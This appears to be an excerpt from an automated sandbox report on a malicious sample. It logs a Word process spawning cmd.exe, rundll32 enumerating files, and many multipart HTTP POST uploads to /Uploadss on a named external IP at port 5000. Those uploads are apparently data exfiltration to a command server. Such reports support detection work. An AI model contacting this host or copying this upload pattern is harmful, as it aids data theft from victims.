Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92CCDD10 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
Source: winword.exeMemory has grown: Private usage: 1MB later: 100MB

Networking

barindex
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 172.104.160.126 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 8099
Source: unknownNetwork traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 8099
Source: unknownNetwork traffic detected: HTTP traffic on port 8099 -> 49195
Source: unknownNetwork traffic detected: HTTP traffic on port 49209 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49209
Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49210
Source: unknownNetwork traffic detected: HTTP traffic on port 49211 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49211
Source: unknownNetwork traffic detected: HTTP traffic on port 49212 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 49214 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49214
Source: unknownNetwork traffic detected: HTTP traffic on port 49215 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49215
Source: unknownNetwork traffic detected: HTTP traffic on port 49216 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49216
Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49218
Source: unknownNetwork traffic detected: HTTP traffic on port 49219 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49219
Source: unknownNetwork traffic detected: HTTP traffic on port 49220 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49220
Source: unknownNetwork traffic detected: HTTP traffic on port 49221 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49221
Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49222
Source: unknownNetwork traffic detected: HTTP traffic on port 49223 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49223
Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49224
Source: unknownNetwork traffic detected: HTTP traffic on port 49225 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49225
Source: unknownNetwork traffic detected: HTTP traffic on port 49226 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49226
Source: unknownNetwork traffic detected: HTTP traffic on port 49227 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49227
Source: unknownNetwork traffic detected: HTTP traffic on port 49228 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49228
Source: unknownNetwork traffic detected: HTTP traffic on port 49229 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49229
Source: unknownNetwork traffic detected: HTTP traffic on port 49230 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49230
Source: unknownNetwork traffic detected: HTTP traffic on port 49231 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49231
Source: unknownNetwork traffic detected: HTTP traffic on port 49232 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49232
Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49234
Source: unknownNetwork traffic detected: HTTP traffic on port 49235 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49235
Source: unknownNetwork traffic detected: HTTP traffic on port 49236 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49236
Source: unknownNetwork traffic detected: HTTP traffic on port 49237 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49237
Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49238
Source: unknownNetwork traffic detected: HTTP traffic on port 49239 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49239
Source: unknownNetwork traffic detected: HTTP traffic on port 49240 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49240
Source: unknownNetwork traffic detected: HTTP traffic on port 49241 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49241
Source: unknownNetwork traffic detected: HTTP traffic on port 49242 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49242
Source: unknownNetwork traffic detected: HTTP traffic on port 49243 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49243
Source: unknownNetwork traffic detected: HTTP traffic on port 49244 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49244
Source: unknownNetwork traffic detected: HTTP traffic on port 49245 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49245
Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49246
Source: unknownNetwork traffic detected: HTTP traffic on port 49247 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49247
Source: unknownNetwork traffic detected: HTTP traffic on port 49248 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49248
Source: unknownNetwork traffic detected: HTTP traffic on port 49249 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49249
Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49250
Source: unknownNetwork traffic detected: HTTP traffic on port 49251 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49251
Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49252
Source: unknownNetwork traffic detected: HTTP traffic on port 49253 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49253
Source: unknownNetwork traffic detected: HTTP traffic on port 49254 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49254
Source: unknownNetwork traffic detected: HTTP traffic on port 49255 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49255
Source: unknownNetwork traffic detected: HTTP traffic on port 49256 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49256
Source: unknownNetwork traffic detected: HTTP traffic on port 49257 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49257
Source: unknownNetwork traffic detected: HTTP traffic on port 49258 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49258
Source: unknownNetwork traffic detected: HTTP traffic on port 49259 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49259
Source: unknownNetwork traffic detected: HTTP traffic on port 49260 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49260
Source: unknownNetwork traffic detected: HTTP traffic on port 49261 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49261
Source: unknownNetwork traffic detected: HTTP traffic on port 49262 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49262
Source: unknownNetwork traffic detected: HTTP traffic on port 49263 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49263
Source: unknownNetwork traffic detected: HTTP traffic on port 49264 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49264
Source: unknownNetwork traffic detected: HTTP traffic on port 49265 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49265
Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49266
Source: unknownNetwork traffic detected: HTTP traffic on port 49267 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49267
Source: unknownNetwork traffic detected: HTTP traffic on port 49269 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 49271 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49271
Source: unknownNetwork traffic detected: HTTP traffic on port 49272 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49272
Source: unknownNetwork traffic detected: HTTP traffic on port 49273 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49273
Source: unknownNetwork traffic detected: HTTP traffic on port 49274 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49274
Source: unknownNetwork traffic detected: HTTP traffic on port 49275 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49275
Source: unknownNetwork traffic detected: HTTP traffic on port 49276 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49276
Source: unknownNetwork traffic detected: HTTP traffic on port 49277 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknownNetwork traffic detected: HTTP traffic on port 49279 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49279
Source: unknownNetwork traffic detected: HTTP traffic on port 49280 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49280
Source: unknownNetwork traffic detected: HTTP traffic on port 49281 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49281
Source: unknownNetwork traffic detected: HTTP traffic on port 49282 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49282
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49284
Source: unknownNetwork traffic detected: HTTP traffic on port 49285 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 49287 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49287
Source: unknownNetwork traffic detected: HTTP traffic on port 49288 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49288
Source: unknownNetwork traffic detected: HTTP traffic on port 49289 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49289
Source: unknownNetwork traffic detected: HTTP traffic on port 49290 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49290
Source: unknownNetwork traffic detected: HTTP traffic on port 49291 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49291
Source: unknownNetwork traffic detected: HTTP traffic on port 49292 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49292
Source: unknownNetwork traffic detected: HTTP traffic on port 49293 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49293
Source: unknownNetwork traffic detected: HTTP traffic on port 49294 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49294
Source: unknownNetwork traffic detected: HTTP traffic on port 49295 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49295
Source: unknownNetwork traffic detected: HTTP traffic on port 49296 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49296
Source: unknownNetwork traffic detected: HTTP traffic on port 49297 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49297
Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49298
Source: unknownNetwork traffic detected: HTTP traffic on port 49299 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49299
Source: unknownNetwork traffic detected: HTTP traffic on port 49300 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49300
Source: unknownNetwork traffic detected: HTTP traffic on port 49301 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49301
Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49302
Source: unknownNetwork traffic detected: HTTP traffic on port 49303 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49303
Source: unknownNetwork traffic detected: HTTP traffic on port 49304 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49304
Source: unknownNetwork traffic detected: HTTP traffic on port 49305 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49305
Source: unknownNetwork traffic detected: HTTP traffic on port 49306 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49306
Source: unknownNetwork traffic detected: HTTP traffic on port 49307 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49307
Source: unknownNetwork traffic detected: HTTP traffic on port 49308 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49308
Source: unknownNetwork traffic detected: HTTP traffic on port 49309 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49309
Source: unknownNetwork traffic detected: HTTP traffic on port 49310 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknownNetwork traffic detected: HTTP traffic on port 49311 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49311
Source: unknownNetwork traffic detected: HTTP traffic on port 49312 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49312
Source: unknownNetwork traffic detected: HTTP traffic on port 49313 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49313
Source: unknownNetwork traffic detected: HTTP traffic on port 49314 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49314
Source: unknownNetwork traffic detected: HTTP traffic on port 49315 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49315
Source: unknownNetwork traffic detected: HTTP traffic on port 49316 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49316
Source: unknownNetwork traffic detected: HTTP traffic on port 49317 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49317
Source: unknownNetwork traffic detected: HTTP traffic on port 49318 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49318
Source: unknownNetwork traffic detected: HTTP traffic on port 49319 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49319
Source: unknownNetwork traffic detected: HTTP traffic on port 49320 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49320
Source: unknownNetwork traffic detected: HTTP traffic on port 49321 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49321
Source: unknownNetwork traffic detected: HTTP traffic on port 49322 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49322
Source: unknownNetwork traffic detected: HTTP traffic on port 49323 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49323
Source: unknownNetwork traffic detected: HTTP traffic on port 49324 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49324
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 49327 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49327
Source: unknownNetwork traffic detected: HTTP traffic on port 49328 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49328
Source: unknownNetwork traffic detected: HTTP traffic on port 49329 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49329
Source: unknownNetwork traffic detected: HTTP traffic on port 49330 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49330
Source: unknownNetwork traffic detected: HTTP traffic on port 49331 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49331
Source: unknownNetwork traffic detected: HTTP traffic on port 49332 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49332
Source: unknownNetwork traffic detected: HTTP traffic on port 49333 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49333
Source: unknownNetwork traffic detected: HTTP traffic on port 49334 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49334
Source: unknownNetwork traffic detected: HTTP traffic on port 49335 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49335
Source: unknownNetwork traffic detected: HTTP traffic on port 49336 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49336
Source: unknownNetwork traffic detected: HTTP traffic on port 49337 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49337
Source: unknownNetwork traffic detected: HTTP traffic on port 49338 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49338
Source: global trafficTCP traffic: 192.168.2.6:49191 -> 1.1.1.1:53
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 763Content-Type: multipart/form-data; boundary=------------------------f9fa7306880345da
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 160166Content-Type: multipart/form-data; boundary=------------------------f13a1e66d9ac3858
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 106918Content-Type: multipart/form-data; boundary=------------------------3db099609e8ee48c
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 5243310Content-Type: multipart/form-data; boundary=------------------------f661165eccdedd9dExpect: 100-continue
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2fe595d5319db200
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4b737e61e1b7e9bf
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4e35b57d9f58fc90
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------815ab7d36e08e457
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a5d52e19e3fe200b
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------ec3ba31dfe96d326
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f22aeea0bd5a0f8e
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d8bdcfc228d82f5a
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------cfe9280e100efce1
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------904a2babf6d2f7ac
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f49946b6384ac060
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b85ce3e308f45060
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------614e08f55f0c2cfe
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------bea6c7b09692f28c
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------23dd402f4b4a39c5
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e591042c4603c21a
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a0f76a6adccf351c
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------c4d90e433018b142
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d2ca679a5d8f632b
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 763Content-Type: multipart/form-data; boundary=------------------------72fb5c35750f8204
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 160166Content-Type: multipart/form-data; boundary=------------------------43289e4b14c04ac7
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 106918Content-Type: multipart/form-data; boundary=------------------------71ca7f7e591272d4
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 5243310Content-Type: multipart/form-data; boundary=------------------------727b88163de31621Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------528cb38273400043
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6ceab3228cef8607
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a158dee7d748d662
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5e2d7668485dfa80
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0f7ba0280905d0a7
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b615441db0569974
Source: global trafficHTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: */*Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------c38b6efbb3860b55
